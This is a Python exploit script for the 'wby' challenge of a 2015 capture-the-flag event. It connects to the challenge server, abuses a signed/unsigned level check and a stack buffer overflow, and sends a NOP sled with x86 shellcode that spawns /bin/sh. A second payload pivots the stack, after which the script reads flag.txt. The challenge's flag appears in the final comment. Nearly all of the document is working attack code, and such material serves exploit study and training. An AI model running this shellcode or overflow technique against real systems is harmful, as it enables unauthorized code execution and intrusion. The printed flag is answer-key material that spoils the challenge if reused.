"""ETC b-side ctf 2015 - wby  (LF0827, 2015. 3. 18. 06:22)

Exploit script for the 'wby' challenge exactly as published on the page.
It drives the remote service through its text menu, delivers two crafted
inputs (payload1 and payload2, whose layout is described only by the
author's own inline comments below), and finally reads flag.txt.

Files referenced on the page:
    wby-23859086c3e87a4beb04b4f920b7ed49d407326e
    wby-23859086c3e87a4beb04b4f920b7ed49d407326e.idb
"""
from lsm import *  # NOTE(review): assumes lsm provides Connect, read_until, p and sleep -- not visible here

host = "wildblue.termsec.net"
port = 2323
#host = "192.168.0.13"
#port = 9998

# Raw machine code bytes embedded in payload1 (taken verbatim from the page).
shellcode = (
    "\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80"
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50"
    "\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
)

s = Connect(host, port)

# Menu walk-through: name prompt, main menu, then the level prompt.
read_until(s, "thee?")   # name
s.send("aaa\n")
read_until(s, "choice?")  # choice
s.send("1\n")
read_until(s, "[1-3]:")   # select level
s.send("179\n")           # unsigned value 179, signed value -77

# First crafted input; the author's comments give the intended layout.
payload1 = "".join([
    "A" * 32,        # using for bypass of 'input_value <= 1f'
    p(0x20202028),   # 0x20202020
    "\x90" * 64,     # 0x20202024~~
    shellcode,
    "A\n",
])

# 179 level inputs are answered: 178 filler lines, payload1 on the last one.
LAST_INPUT = 178
for idx in range(LAST_INPUT + 1):
    read_until(s, ":")
    s.send(payload1 if idx == LAST_INPUT else "AAAA\n")

sleep(1)
read_until(s, "choice?")
s.send("3\n")

# Second crafted input, sent in reply to the name prompt of menu item 3.
payload2 = "".join([
    "A" * 48,
    p(0x20202024),   # lea esp, [ecx-4]
    "BBBB",          # mov ecx, [ebp-4]
    "A\n",           # This 'A' will be set zero
])
# result, esp = 0x20202020
read_until(s, "thee?")
s.send(payload2)
read_until(s, "choice?")
s.send("4\n")
sleep(1)

# Interactive loop kept from the page, where it is disabled as a bare
# string literal (no runtime effect):
#   while 1:
#       tmp = raw_input("$ ")
#       if len(tmp):
#           s.send(tmp + "\n")
#       else:
#           continue
#       print s.recv(4096)

# Read the flag and print whatever the single recv() returns.
s.send("cat flag.txt\n")
print(s.recv(1024))
#flag{k1ck_in_tha_d00r_wavin_tha_44}